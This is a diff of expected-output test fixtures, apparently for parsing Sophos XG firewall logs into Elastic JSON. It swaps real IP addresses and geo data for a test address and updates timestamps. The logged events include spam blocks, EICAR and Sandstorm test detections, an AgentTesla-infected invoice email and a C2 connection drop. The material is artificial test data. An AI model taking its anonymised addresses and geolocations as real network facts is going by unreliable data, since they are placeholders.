log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"\u003c20200518070235.C1623996C64F9957@ELTOBGI.COM\u003e\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=GBR dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 
quarantine_reason=\"RBL\"", "code": "045908413004", "kind": "alert", "action": "Probable Spam", @@ -553,7 +550,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566085600Z", + "ingested": "2021-12-09T13:44:55.714820100Z", "original": "device=\"SFW\" date=2017-01-31 time=18:34:41 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=041113413005 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Outbound Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"gaurav\" av_policy_name=\"Gaurav123\" from_email_address=\"gaurav1@iview.com\" to_email_address=\" gaurav2@iview.com\" email_subject=\"RPD Spam Test: Spam\" mailid=\"\u003ca22c9da6-19e5-4764-2836-3f48d7dcc329@iview.com\u003e\" mailsize=405 spamaction=\"Accept\" reason=\"\" src_domainname=\" iview.com\" dst_domainname=\"\" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol=\"TCP\" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041113413005", "kind": "alert", 
@@ -648,7 +645,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566090900Z", + "ingested": "2021-12-09T13:44:55.714826Z", "original": "device=\"SFW\" date=2018-06-06 time=11:10:11 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041114413006 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Outbound Probable Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"rule 8\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman.local\" email_subject=\"RPD Spam test: Bulk\" mailid=\"\u003cc63b1eb2-1c17-73ac-fcc3- 20e8831dc3d3@postman.local\u003e\" mailsize=439 spamaction=\"Drop\" reason=\"Mail detected as OUTBOUND PROBABLE SPAM.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041114413006", "kind": "alert", 
@@ -743,7 +740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566096300Z", + "ingested": "2021-12-09T13:44:55.714831800Z", "original": "device=\"SFW\" date=2018-06-06 time=12:50:07 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041121613009 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"DLP\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"postman\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman. local\" email_subject=\"Fwd: TESt\" mailid=\"c0000002-1528269606\" mailsize=5041 spamaction=\"DROP\" reason=\"Email containing confidential data detected. Relevant Data Protection Policy applied.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"DLP\"", "code": "041121613009", "kind": "alert", @@ -838,7 +835,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566102700Z", + "ingested": "2021-12-09T13:44:55.714838100Z", "original": "device=\"SFW\" date=2018-06-06 time=12:51:34 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041122613010 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"SPX\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman.local\" email_subject=\"[secure:pankhil]\" mailid=\"c0000003-1528269693\" mailsize=442 spamaction=\"Accept\" reason=\"SPX Template of type Specified by Sender successfully applied on Email.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.16.204 dst_country_code=R1 protocol=\"TCP\" src_port=60298 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041122613010", "kind": "event", 
@@ -922,7 +919,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566106700Z", + "ingested": "2021-12-09T13:44:55.714843900Z", "original": "device=\"SFW\" date=2018-06-06 time=12:53:39 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041123413012 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Dos\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"\" to_email_address=\"\" email_subject=\"\" mailid=\"\" mailsize=0 spamaction=\"TMPREJECT\" reason=\"SMTP DoS\" src_domainname=\"\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60392 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041123413012", "kind": "alert", @@ -1016,7 +1013,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566112500Z", + "ingested": "2021-12-09T13:44:55.714849800Z", "original": "device=\"SFW\" date=2018-06-06 time=12:56:53 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041102413014 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Denied\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"postman\" from_email_address=\"pankhil1@postman.local\" to_email_address=\"pankhil@postman. local\" email_subject=\"Fwd: test sand\" mailid=\"c0000008-1528270010\" mailsize=419835 spamaction=\"DROP\" reason=\"Email is marked Malicious by Sophos Sandstorm.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60608 dst_port=25 sent_bytes=0 recv_bytes=0", "code": "041102413014", "kind": "alert", 
@@ -1112,7 +1109,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566118100Z", + "ingested": "2021-12-09T13:44:55.714855600Z", "original": "device=\"SFW\" date=2017-01-31 time=18:31:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=041207414001 log_type=\"Anti-Spam\" log_component=\"POP3\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"gaurav\" av_policy_name=\"GauravPatel\" from_email_address=\"gaurav1@iview.com\" to_email_address=\"gaurav2@iview. com\" email_subject=\"RPD Spam Test: Spam\" mailid=\"\u003c2a2dd5d4-1a30-617b-27b1-7961ad07cf07@iview.com\u003e\" mailsize=574 spamaction=\"Accept\" reason=\"\" src_domainname=\" iview.com\" dst_domainname=\"iview.com\" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol=\"TCP\" src_port=22333 dst_port=110 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041207414001", "kind": "alert", 
@@ -1133,41 +1130,57 @@ "server": { "port": 80, "bytes": 1616, - "ip": "13.226.155.93" + "ip": "175.16.199.1" }, "log": { "level": "critical" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 1616, - "ip": "13.226.155.93" + "ip": "175.16.199.1" }, "rule": { "id": "2" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 57695, "bytes": 550, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "url": { "original": "http://sophostest.com/Sandstorm/SBTestFile1.pdf", @@ -1194,8 +1207,7 @@ "defaulttest.local" ], "ip": [ - "172.16.34.24", - "13.226.155.93" + "175.16.199.1" ] }, "sophos": { @@ -1219,7 +1231,7 @@ "client": { "port": 57695, "bytes": 550, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "http": { "response": { 
@@ -1228,8 +1240,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566122100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:33 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"Sandstorm\" url=\"http://sophostest.com/Sandstorm/SBTestFile1.pdf\" domainname=\"sophostest.com\" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.93 dst_country_code=USA protocol=\"TCP\" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", + "ingested": "2021-12-09T13:44:55.714861800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:33 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"Sandstorm\" url=\"http://sophostest.com/Sandstorm/SBTestFile1.pdf\" domainname=\"sophostest.com\" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", "code": "030906208001", "kind": "alert", "action": "Virus", 
@@ -1252,41 +1264,57 @@ "server": { "port": 80, "bytes": 553, - "ip": "13.226.155.18" + "ip": "175.16.199.1" }, "log": { "level": "critical" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 553, - "ip": "13.226.155.18" + "ip": "175.16.199.1" }, "rule": { "id": "2" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 57835, "bytes": 541, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "url": { "original": "http://sophostest.com/eicar/index.html", @@ -1313,8 +1341,7 @@ "testhost.local" ], "ip": [ - "172.16.34.24", - "13.226.155.18" + "175.16.199.1" ] }, "sophos": { @@ -1338,7 +1365,7 @@ "client": { "port": 57835, "bytes": 541, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "http": { "response": { 
@@ -1347,8 +1374,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566126300Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"EICAR-AV-Test\" url=\"http://sophostest.com/eicar/index.html\" domainname=\"sophostest.com\" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.18 dst_country_code=USA protocol=\"TCP\" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", + "ingested": "2021-12-09T13:44:55.714867800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"EICAR-AV-Test\" url=\"http://sophostest.com/eicar/index.html\" domainname=\"sophostest.com\" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", "code": "030906208001", "kind": "alert", "action": "Virus", 
@@ -1371,25 +1398,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "186.8.209.194" + "ip": "175.16.199.1" }, "log": { "level": "critical" }, "destination": { "geo": { - "continent_name": "South America", - "country_name": "Uruguay", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -56.0, - "lat": -33.0 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "UY" + "country_iso_code": "CN" }, "as": { - "number": 19422, + "number": 4837, "organization": { - "name": "Telefonica Moviles del Uruguay SA" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -1397,25 +1426,27 @@ "email": "info@elastic-user.local" }, "bytes": 0, - "ip": "186.8.209.194" + "ip": "175.16.199.1" }, "rule": { "id": "22" }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 8560, + "number": 4837, "organization": { - "name": "1\u00261 Ionos Se" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 56336, @@ -1423,7 +1454,7 @@ "email": "info@farasamed.com" }, "bytes": 0, - "ip": "82.165.194.211" + "ip": "175.16.199.1" }, "url": { "domain": "farasamed.com" @@ -1449,8 +1480,7 @@ "defaulttest.local" ], "ip": [ - "82.165.194.211", - "186.8.209.194" + "175.16.199.1" ] }, "sophos": { 
@@ -1478,12 +1508,12 @@ "client": { "port": 56336, "bytes": 0, - "ip": "82.165.194.211" + "ip": "175.16.199.1" }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566130Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"\u003c20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", + "ingested": "2021-12-09T13:44:55.714958Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"\u003c20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "code": "031106210001", "kind": "alert", "action": "Virus", 
@@ -1503,25 +1533,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "185.7.209.194" + "ip": "175.16.199.1" }, "log": { "level": "critical" }, "destination": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 42652, + "number": 4837, "organization": { - "name": "inexio Informationstechnologie und Telekommunikation Gmbh" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -1529,28 +1561,27 @@ "email": "info@elastic-user.local" }, "bytes": 0, - "ip": "185.7.209.194" + "ip": "175.16.199.1" }, "rule": { "id": "22" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3004, - "lat": 47.4902 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 54290, + "number": 4837, "organization": { - "name": "Hostwinds LLC." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 54693, @@ -1558,7 +1589,7 @@ "email": "spedizioni@divella.it" }, "bytes": 0, - "ip": "23.254.247.78" + "ip": "175.16.199.1" }, "url": { "domain": "divella.it" @@ -1584,8 +1615,7 @@ "testhost.local" ], "ip": [ - "23.254.247.78", - "185.7.209.194" + "175.16.199.1" ] }, "sophos": { 
@@ -1613,12 +1643,12 @@ "client": { "port": 54693, "bytes": 0, - "ip": "23.254.247.78" + "ip": "175.16.199.1" }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566135400Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"\u003c20200519072944.AFCA295AF2A037A6@divella.it\u003e\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", + "ingested": "2021-12-09T13:44:55.715010100Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"\u003c20200519072944.AFCA295AF2A037A6@divella.it\u003e\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "code": "031106210001", "kind": "alert", "action": "Virus", 
@@ -1719,7 +1749,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566140900Z", + "ingested": "2021-12-09T13:44:55.715016400Z", "original": "device=\"SFW\" date=2018-06-06 time=10:51:29 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=036106211001 log_type=\"Anti-Virus\" log_component=\"POPS\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil@postman.local\" subject=\"EICAR\" mailid=\"\u003ca5c35e4b-1198-d0eb-0763-c0d5af3c817e@postman.local\u003e\" mailsize=0 virus=\"EICAR-AV-Test\" filename=\"\" quarantine=\"\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "036106211001", "kind": "alert", @@ -1821,7 +1851,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566147800Z", + "ingested": "2021-12-09T13:44:55.715022700Z", "original": "device=\"SFW\" date=2018-06-06 time=10:58:29 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=036206212001 log_type=\"Anti-Virus\" log_component=\"IMAPS\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"ganga@postman.local\" subject=\"EICAR test email\" mailid=\"\u003c2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local\u003e\" mailsize=0 virus=\"EICAR-AV-Test\" filename=\"\" quarantine=\"\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "036206212001", "kind": "alert", 
@@ -1915,7 +1945,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566155500Z", + "ingested": "2021-12-09T13:44:55.715028700Z", "original": "device=\"SFW\" date=2018-06-21 time=19:50:23 timezone=\"CEST\" device_name=\"SF01V\" device_id=SFDemo-2df0960 log_id=031006209001 log_type=\"Anti-Virus\" log_component=\"FTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" virus=\"EICAR-AV-Test\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Upload\" filename=\" /home/ftp-user/ta_test_file_1ta-cl1-46\" file_size=0 file_path=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" ftpcommand=\"STOR\" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol=\"TCP\" src_port=39910 dst_port=21 dstdomain=\"\" sent_bytes=0 recv_bytes=0", "code": "031006209001", "kind": "alert", @@ -2007,7 +2037,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566163200Z", + "ingested": "2021-12-09T13:44:55.715034600Z", "original": "device=\"SFW\" date=2018-06-21 time=19:50:48 timezone=\"CEST\" device_name=\"SF01V\" device_id=SFDemo-2df0960 log_id=031001609002 log_type=\"Anti-Virus\" log_component=\"FTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" virus=\"\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Download\" filename=\"/home/ftp-user /ta_test_file_1ta-cl1-46\" file_size=19926248 file_path=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" ftpcommand=\"RETR\" src_ip=10.146.13.49 src_country_code= dst_ip=10.8.142.181 dst_country_code= protocol=\"TCP\" src_port=39936 dst_port=21 dstdomain=\"\" sent_bytes=0 recv_bytes=19926248", "code": "031001609002", "kind": "event", 
@@ -2025,29 +2055,31 @@ { "server": { "port": 80, - "ip": "46.161.30.47" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "RU" + "country_iso_code": "CN" }, "as": { - "number": 44050, + "number": 4837, "organization": { - "name": "Petersburg Internet Network ltd." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "46.161.30.47" + "ip": "175.16.199.1" }, "source": { "port": 22623, @@ -2057,7 +2089,7 @@ "ip": "10.198.47.71" }, "url": { - "original": "46.161.30.47" + "original": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -2084,7 +2116,7 @@ ], "ip": [ "10.198.47.71", - "46.161.30.47" + "175.16.199.1" ] }, "sophos": { 
@@ -2109,8 +2141,8 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566170900Z", - "original": "device=\"SFW\" date=2017-01-31 time=18:44:31 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=086304418010 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Drop\" priority=Warning user_name=\"jsmith\" protocol=\"TCP\" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=46.161.30.47 url=46.161.30.47 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", + "ingested": "2021-12-09T13:44:55.715040600Z", + "original": "device=\"SFW\" date=2017-01-31 time=18:44:31 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=086304418010 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Drop\" priority=Warning user_name=\"jsmith\" protocol=\"TCP\" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", "code": "086304418010", "kind": "alert", "action": "drop", 
@@ -2129,36 +2161,52 @@ { "server": { "port": 80, - "ip": "13.226.155.22" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "13.226.155.22" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 57579, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "url": { "original": "http://sophostest.com/callhome/index.html" @@ -2184,8 +2232,7 @@ "testhost.local" ], "ip": [ - "172.16.34.24", - "13.226.155.22" + "175.16.199.1" ] }, "sophos": { 
